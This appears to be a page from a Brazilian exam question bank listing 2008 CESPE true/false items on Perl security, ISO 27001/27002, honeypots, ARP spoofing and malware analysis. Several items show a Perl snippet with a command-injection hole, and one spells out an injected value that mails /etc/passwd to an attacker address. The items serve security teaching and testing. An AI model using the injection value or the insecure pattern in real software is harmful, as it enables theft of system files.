Magna Concursos

Foram encontradas 120 questões.

1525222 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

Nas linhas de 4 a 7, é mostrado um trecho de código no qual, se a variável $ mail_to tivesse o valor a@x.com; mail hacker@teste.com</etc/passwd permitiria que o arquivo de passwords fosse enviado a um usuário malicioso.

 

Provas

Questão presente nas seguintes provas
1525221 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

No trecho de código das linhas de 1 a 3, se o valor de retorno do open() for diferente de zero, é executado o programa txt2html, caso contrário, a sentença do print é executada.

 

Provas

Questão presente nas seguintes provas
1525220 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

Nas linhas de 1 a 3, ao se abrir um arquivo para "-", seja para leitura ou escrita, o Perl executa um fork do processo atual e retorna o PID do processo filho ao processo pai e 0 para o processo filho. A sentença or é utilizada como elemento decisório para quando se está no processo pai ou no processo filho.

 

Provas

Questão presente nas seguintes provas
1525219 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nas normas ABNT NBR ISO/IEC 27001:2006 e 27002:2005, julgue os itens que se seguem.

A seção 5 da norma ISO/IEC 27001 trata de como a informação deve ser classificada, de acordo com a sua necessidade de segurança e controle de acesso.

 

Provas

Questão presente nas seguintes provas
1525218 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nas normas ABNT NBR ISO/IEC 27001:2006 e 27002:2005, julgue os itens que se seguem.

Uma organização que deseje implantar um sistema de gestão de segurança da informação (SGSI) deve adotar como base a norma ABNT NBR ISO/IEC 27001:2006

 

Provas

Questão presente nas seguintes provas
1525217 Ano: 2008
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Um desfragmentador de tráfego em um elemento de rede tem por objetivo remover as ambigüidades no tráfego que por ele passa. Exemplos de desfragmentadores incluem o programa norm e a diretiva scrub do OpenBSD.

 

Provas

Questão presente nas seguintes provas
1525216 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Um invasor que possa emitir consultas ou respostas ARP forjadas, injetando informações falsas nos caches dos hosts em uma rede Ethernet, pode receber o tráfego de rede destinado a outro host, repassando-o, em seguida, para o seu destino original.

 

Provas

Questão presente nas seguintes provas
1525215 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Os honeypots de pesquisa são aqueles que aumentam a segurança de uma organização específica e ajudam a mitigar riscos. Usualmente possuem as mesmas configurações que o ambiente de trabalho da organização.

 

Provas

Questão presente nas seguintes provas
1525214 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Quanto a conceitos de análise e engenharia reversa de artefatos maliciosos, julgue os itens a seguir.

Na detecção de código malicioso, a análise dinâmica permite realizar uma avaliação exaustiva ao não se restringir a uma execução específica de um programa. O contrário ocorre na análise temporal, que verifica o programa somente no momento da sua execução.

 

Provas

Questão presente nas seguintes provas
1525213 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Quanto a conceitos de análise e engenharia reversa de artefatos maliciosos, julgue os itens a seguir.

Os denominados Cavalos de Tróia, da mesma forma que os vírus de computador, escondem ações maliciosas dentro de um programa que aparentemente realizam tarefas normais no sistema.

 

Provas

Questão presente nas seguintes provas